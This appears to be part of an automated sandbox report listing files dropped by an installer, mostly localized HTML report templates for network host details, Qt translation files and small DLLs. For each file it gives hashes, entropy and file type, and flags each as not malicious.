                                                                                                                                                                                                  SSDEEP:24:lFourZsuSd/Xqk/Hu0B10Kt5RGDz9ScReEhyv:HnrZsRhXqmHu410U2Dz9S+s
                                                                                                                                                                                                  MD5:04C416BEC9FE7DEC52E2F368353FF1F9
                                                                                                                                                                                                  SHA1:DB86325EDF8EED3639A26ED279A00EBC9208ED1E
                                                                                                                                                                                                  SHA-256:10946712CE123E177350A9D96F61B2011FFCCC90597880F256E3A24676CD4B30
                                                                                                                                                                                                  SHA-512:4069E9327ED9BE5FA81EF9A7148959B376677710D8D77CE1B247AF5065C1E7B2CC50561E47F7AEBA2DA48A8FBC79752147CCF262A8C1E6A66408ACFF07489E29
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operating system:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Manufacturer:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>User:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Date:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comments:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</center><
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                  Entropy (8bit):5.137449444677303
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFo/JhkCsuSH9ioXqIVoH39/m0Kt5RGDISReEhyv:HYZsRH9ZXqImHN/m0U2DIYs
                                                                                                                                                                                                  MD5:C09C9A49D20E9E03FBA82E0247B38770
                                                                                                                                                                                                  SHA1:B95253268F788CEB0B603E194C4AB1A7451B2C44
                                                                                                                                                                                                  SHA-256:717CDB05CB153C7C3389BA679B737EE4CABB7DF340AE74B6971CB231526EA3AD
                                                                                                                                                                                                  SHA-512:BAE15F62E99B43C1D7EF0AC4F5BEAFEA1629428668DE1237CDE1903E03B462EB687DE089DFB87B77CA97E8D02D72650EB274595F07DE6DD86FD459C634B97594
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>......:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>............ .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):7.0606914357897885
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:B6awWVghW/d7l9YOCAs/nGfe4pBjSf/pjWNArXVWQ4mWgmqnajLQvTP+8jP9Tz8U:WW2hWF7QA0GftpBjQ9YlvQyURz8RG
                                                                                                                                                                                                  MD5:A20084F41B3F1C549D6625C790B72268
                                                                                                                                                                                                  SHA1:E3669B8D89402A047BFBF9775D18438B0D95437E
                                                                                                                                                                                                  SHA-256:0FA42237FD1140FD125C6EDB728D4C70AD0276C72FA96C2FAABF7F429FA7E8F1
                                                                                                                                                                                                  SHA-512:DDF294A47DD80B3ABFB3A0D82BC5F2B510D3734439F5A25DA609EDBBD9241ED78045114D011925D61C3D80B1CCD0283471B1DAD4CF16E2194E9BC22E8ABF278F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1179
                                                                                                                                                                                                  Entropy (8bit):4.8880159035742965
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoxnsuSzf9Xqkf9HMXQph0Kt5RGDtn9U8ReEhyv:HqnsRJXqklHMAr0U2Dtn9Js
                                                                                                                                                                                                  MD5:1588431C36A3112355553A6967E3405E
                                                                                                                                                                                                  SHA1:0987D0C5E70F9F25B2E83AA314C83EC8B67539E8
                                                                                                                                                                                                  SHA-256:69655CAB681BC5E4B8AB6D3E160CE914193156E9FD09DA36B3116B6BB958457B
                                                                                                                                                                                                  SHA-512:F4A1362AA900BA4B854E8DB2653D21A26D6A21151D2A979076C81B9F1DC9048DA95EE193C9FA4EDB67E8F85D71F23460C2180213D031B548DCFC495F58990351
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statuss:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.t.jsist.ma:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Ra.ot.js:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Lietot.js:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tips:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datums:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.ri:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Pakalpojums</center></b></td><td><b><center>De
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28344
                                                                                                                                                                                                  Entropy (8bit):4.687451491727224
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:qjVfhQdGPdlCzQt1OY8L7HP7xpLnR0l7sY1m1ZDxE0FTlHwLGW6F0:qjthQoPdlkQt1O1Hv7xpLnul7xcFxFr0
                                                                                                                                                                                                  MD5:950906410E936E0BB5F109082105D7B6
                                                                                                                                                                                                  SHA1:C2B7B811141FDAC2DBC712095759E3C68CE77565
                                                                                                                                                                                                  SHA-256:F0DB0B2040454AE4CF27A7398C28E4C32CD0151D30AD1ED59ACC8C8C021335CF
                                                                                                                                                                                                  SHA-512:FC7A0D8B6E9D1E82E8596CCF57889B55B455D3A8036D78FB190BEDC724BC28588F68A295C42AEBBEC1623F7AE78ADACD94F2791F4008874C0B7CFFD2845181AA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........ZB...;.......;.......;.......;..!}...;..Dp...O..]....[..X....^..07...^..T...(5......G.......H,..Q...K...@...N:...h..V...E..._...^h......)Z......Q....y..RS......................Z....t..+....t..R....t..\......A....j......5t......@...C...H5..Z...f...0g......F................!...~..3J...`..8"...e..\3......\].......H. =...G..*.y.....*.y...].*.%..%6.*.0..%g.+.....U.+.......+......+......+....'..G.... ..G....+m.H0...\..Hw9.....Hw9.....I....(..J6......J6......J6......J6...JY.LD......L.b..\..M.S..B&.R.......V....0..Wi...[..W.T.....Z.|..S..[f3..Wd.gc....F.w0K..I...H...&.......]....T......."..5....~..7... d..G....T......2....M......[L......a..9.E..A..L.#..d..M$o.....e.......l8...79...^..J...I....f......C.......Ti......[...>...]..>......3../...l...L ......:..5.l..`..AV...(..y....YQ...0..UH......T%......Z...tb..68.......!..............U.......>>......PB.(....T..1V...)..R....2=.W.<..aE.f.~.."x......5...1....I...^..6....5...=..........c..Gr.;6...b..q.J..Q8..I....M..I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):6.97908669425612
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:MGMWVghW/AvSx9YOCAs/nGfe4pBjSf6qy4X3WNArXVWQ4mWwiS21qnaj9RlS6VEX:iW2hWoSUA0GftpBjfHWbziS2lBRAkEX
                                                                                                                                                                                                  MD5:2886C75F8B9D3EFDF315C44B52847AEE
                                                                                                                                                                                                  SHA1:4FC75E39493B356F1F219798E3738DBC764281E4
                                                                                                                                                                                                  SHA-256:3DB27D95689F936B4591EBAD18173AD07FAC07D69D68EEFF06DEE158599D731F
                                                                                                                                                                                                  SHA-512:2931224106EEEA142664AEC9D1D5D028D15A14765BCE8674D34D67FC027F6FEFF3AF283F3D81B113E6EFCD42E6B4BD249E94E01C8F41B5211650F1775774B765
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......9+....@.............................9............ ...................<..............8............................................................................text...I........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26959
                                                                                                                                                                                                  Entropy (8bit):4.713288631353564
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ihIXQdwIyWqLSTgN1YYgX+9S1Dk+nK+sF7SVLHElRh:3XQdwIUCgN1YYgE2k1A4
                                                                                                                                                                                                  MD5:AE4754AC60C32B9D44B47CAA489E5337
                                                                                                                                                                                                  SHA1:6C3AEC0A9EF0945C06562D0ACD0E0558E18992AD
                                                                                                                                                                                                  SHA-256:D09D333B00D073C09837F669D7A8DDD77D50B2D94A177E58CE556AF83700371A
                                                                                                                                                                                                  SHA-512:74710A20298F162D6BE02F7BCBB964E447345D219887216366A7DCD283267A708666E974195F279E384526E324E27F0FBD713411E6BA58DE266069143575C6DC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........U....;.......;.......;.......;.. A...;..@....O..XZ...[..TL...^...1...^..P:..(5......G....6..H,..MT..K...=@..N:...,..V...B#.._...Yn......'.......M....y..M.......................U~...t..)I...t..NV...t..X......>....j...[..5t...-..@...?...H5..V?..f....W......B........u.......Y...~..1....`..5....e..W.......W........:. =...C..*.y...B.*.y...E.*.%..#..*.0..#..+.......+.......+......+......+....%q.G.....g.G....)..H0...W..Hw9...g.Hw9.....I....'T.J6......J6....@.J6......J6...Fo.LD......L.b..X2.M.S..>..R.....\.V.....{.Wi...W4.W.T.....Z.|..O..[f3..R..gc....~.w0K..E...H...$w......X....T......."..2....~..4... d..Cc...T..,...2...........V.......\..9.E..=..L.#.._!.M$o.....e.......l8...4c...^..F...I....L......@"......O.......Vg..>......>...n..3..-...l...H*......7..5.l..[..AV...'..y....T....0..P.......O.......V...tb..3z.......s.......y......Q.......:.......L..(....Pf.1V...($.R....0).W.<..\).f.~..!.......2r..1........^..3....5..............c..C..;6...]..q.J..L...I.......I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28416
                                                                                                                                                                                                  Entropy (8bit):4.745555315840919
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:G1rjeSTVZbKagGwTFToL3RvDWI7zfoiOp3cHWyQ68rZPFaEvRVaib:OHfKagGwTFTWdDWI7boiOp3cHW3P1RVB
                                                                                                                                                                                                  MD5:A8F9FC9108D8E44F2111BC7AC63C9F75
                                                                                                                                                                                                  SHA1:1692FD262A44FD674D4E48644CE22C175AF0C865
                                                                                                                                                                                                  SHA-256:A10D0CF6FC8DD20290BD11529DC1DB210D69B05FE518F2248D6D720AF8495470
                                                                                                                                                                                                  SHA-512:99C008F4CE997384D024390A896275BCD10B53D8725F1E9CB2628AB119B1381DABC5189C60C85A817C52AF33AC3D0E2D190373C9F7F8707A6FDD508E61C4C2B9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........Z....;.......;.......;.......;..!....;..D....O..]....[..Y^...^..0....^..U...(5......G.......H,..R...K...A...N:...r..V...F..._...^.......)d......R;...y..R.......................Z....t..+%...t..S*...t..]=.....A....j......5t......@...C...H5..[O..f...0.......F....................~..3....`..8|...e..\.......\........(. =...G..*.y.....*.y.....*.%..%..*.0..%;.+...../.+.......+....^.+......+....&..G.... ..G....+..H0...]..Hw9.....Hw9.....I....)..J6....n.J6......J6....*.J6...Js.LD......L.b..]r.M.S..B`.R.......V....0..Wi...\J.W.T.....Z.|..S..[f3..W..gc....@.w0K..I ..H...%.......^T...T...%..."..5....~..8... d..GQ...T../...2....7......[.......b..9.E..At.L.#..d..M$o...h.e.......l8...7....^..J...I....H......C.......T.......[u..>...S..>......3..09..l...LZ......;,.5.l..a..AV...(..y....Y....0..U.......T.......[...tb..6f......................V.......>.......P..(....UP.1V...)..R....2..W.<..a..f.~.."N......5*..1...._...^..6....5...A..........c..G..;6...cU.q.J..Q...I....;..I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19648
                                                                                                                                                                                                  Entropy (8bit):6.960490184684636
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:nvj+UKIMFsWVghW/AvSx9YOCAs/nGfe4pBjSf3Ir9WNArXVWQ4mWSEqnajMHxxBB:7+UhW2hWISUA0GftpBjdrZolI663UU
                                                                                                                                                                                                  MD5:B9EA058418BE64F85B0FF62341F7099E
                                                                                                                                                                                                  SHA1:0B37E86267D0C6782E18F734B710817B8B03DA76
                                                                                                                                                                                                  SHA-256:653BE79FA676D052CCE60D743282018FAAAF22E15A3CB8F1EEE01F243D56B431
                                                                                                                                                                                                  SHA-512:EFAAC54C0C6648F666B58E0441315446FDBCB8544C3B9E2005482DE25E62E716D0C66DCB7A9CEDD7967FFC26E394AE9F1B1DFDCE1D4243CFDE737140D1C3D51D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................E............ ...................<..............8............................................................................text...U........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):7.018574692016083
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:CbvuBL3BuW2hWO7QA0GftpBjvEcDflBRAkgD:7BL3BGfyidRA1
                                                                                                                                                                                                  MD5:44CA070DC5C09FF8588CF6CDCB64E7A2
                                                                                                                                                                                                  SHA1:63D1DA68CD984532217BEACC21B868B46EC5D910
                                                                                                                                                                                                  SHA-256:EDEB5B3003DB4EE3767FA012E812323FADEF67663C1B45FED3FCA96CAD5AECC8
                                                                                                                                                                                                  SHA-512:C3A214550993A56907AA35091112F9F89E0A74375A7C268133A7C06D88E5DE4F9C87F7E0BE5007F00081A772DF724590D38966ED465F92217D3EF2F45A29C237
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                                                  Entropy (8bit):4.850275626289269
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lForPQsuSRBXqDH03Rrh0Kt5RGDVx3rgReEhyv:HyPQsRRBXqDHyRt0U2DVtras
                                                                                                                                                                                                  MD5:6B21CA02EF7F5C3E6641DBB222A207DC
                                                                                                                                                                                                  SHA1:215CE642734FDA5004F603E593FAA2EB70663500
                                                                                                                                                                                                  SHA-256:3B0A1534FFEF9FB0B1BA169DDA53E26A940E0C644A47D8567E4E804D3DFADF24
                                                                                                                                                                                                  SHA-512:A61FEAEBB6819C6B2CCC8120FB5E64CE71E8399C19221255FB7C3BCB9F557291A75CF965704003A7EA748753097B9E43D0548C1ACC9FE76DA490F70D55B85461
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                   Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Olek:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Opsüsteem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Tootja:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Kasutaja:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tüüp:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Kuupäev:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentaarid:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Teenus</center></b></td><td><b><center>Üksikasjad</cente
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1256
                                                                                                                                                                                                  Entropy (8bit):5.1672203710221565
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoDdHxqsuSTBXq0QH1R7y0Kt5RGDxD0nIgReEhyv:HeHQsR9XqVH1Re0U2DCds
                                                                                                                                                                                                  MD5:38E55188530EE1FC3B88A22697957911
                                                                                                                                                                                                  SHA1:BDF54BFF5183DEE6D233B521CFF1DBAB6D46BAA7
                                                                                                                                                                                                  SHA-256:EBD614652D83E094756B7E5490105E340FFE27C2664CF0DC4D3626C92E2AB6B4
                                                                                                                                                                                                  SHA-512:F8A603C8C5803B293B37E58AFE3845D187DD894799C9745AEF7F93785A9064BF81D45CEACC27E68F1B263C1769660E95E61D0E5C0B6EFEAED3FFE274A9016CD3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>.......:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>.....:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..........:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>......:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1151
                                                                                                                                                                                                  Entropy (8bit):4.790118218856679
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFouisuSqZXqk/HuW4/0Kt5RGD3ReEhyv:HnisRqZXqmHuWK0U2DNs
                                                                                                                                                                                                  MD5:5AD712B9C416EE21623D620AB6019FB4
                                                                                                                                                                                                  SHA1:51DF096A58D6DF2A7CE33E22511C671883F2228C
                                                                                                                                                                                                  SHA-256:38D4DEAFB763B288A9A2322F4BE6E58909427ECFD025CAF0FDEB537C9880AA21
                                                                                                                                                                                                  SHA-512:608A2240E6F26C9F4A41A3A9B8D6EFCF4DC7735916CD58DFFC2AAC8948889515C2647F11DCF09FF9F0FC9245C7E09B548348B2B89925162EDE288FB0B74217E8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruger:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Oplysninger</cent
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):7.011995208399749
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:XY9fHQduPWVghW/EgbXH9YOCAs/nGfe4pBjSfbxaWNArXVWQ4mW0qnajMHxxBNTM:ef5W2hWcgbCA0GftpBjuYDlI663UD
                                                                                                                                                                                                  MD5:D6ABF5C056D80592F8E2439E195D61AC
                                                                                                                                                                                                  SHA1:33F793FD6A28673E766AD11EE1CF8EB8EF351BC0
                                                                                                                                                                                                  SHA-256:8858D883D180CEA63E3BF4A3F5BC9E0F9FA16C9A35A84C4EFE65308CEA13A364
                                                                                                                                                                                                  SHA-512:6678F17F2274AABBA5279BA40A0159FF8A54241D811845A48D845172F4AA6F7397CFD07BF2368299A613DF1F3FF12E06C0E62C26683DFB08D82122609C3A3F62
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28292
                                                                                                                                                                                                  Entropy (8bit):5.300323619618019
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:sPSD57jf9U4FM1xLvsxmE2Ly36cmKe+4sEQI+feD3/gXTQWym6:sPc7jf9U4FMbLymE2Ly36cmBAbI+fel
                                                                                                                                                                                                  MD5:70059C7809B9DB196A6A58588536B7D6
                                                                                                                                                                                                  SHA1:6C7C41EEEB0E59A75C0E7CA09B34E8AC9C4B8244
                                                                                                                                                                                                  SHA-256:7AFB5C93E0CCE72EAFBAB5B3CE0D82E1102A750EFE9A9F079D47ADB67F60D4A5
                                                                                                                                                                                                  SHA-512:EB4D5EE0E47975CF6FDDAB81AA86670233F385503983B4A8C60031C4BFA5C30BB02DB261CB9FDE6CF09686D749C9DE961294A1E00FD47330EB7A0EE9DCF3DED3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1155
                                                                                                                                                                                                  Entropy (8bit):4.85707182260681
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:AMJnuKome2B2B2uT2B8G2MKb2tcz2HcqQ2Rn2o2n0Kt1RhRGDb7zYLtzAkReEiWC:lFoUssuSqZXq5HJ8n0Kt5RGDUReEhyv
                                                                                                                                                                                                  MD5:1AD783BD4AF434D47BD69AB818A91DFA
                                                                                                                                                                                                  SHA1:8CC2CED11B633A2F11A1E48E7F209A6E9E0A3187
                                                                                                                                                                                                  SHA-256:2A51B6D68D941C570E1F4DE827D60CE7B0063D255A52099B46406D14249EF919
                                                                                                                                                                                                  SHA-512:1AD4BE09630713AB267391C57C0C71AA139B69799F612DC17D8EBD57D91E98E6B037D8102892BB6A53D4CA3AD9EC9C6BDF3F002AEBC69468AFAAEB84211C9E02
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                   Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stan:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>System operacyjny:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Użytkownik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarze:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Usługa</center></b></td><td><b><center>Szczegóły</
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
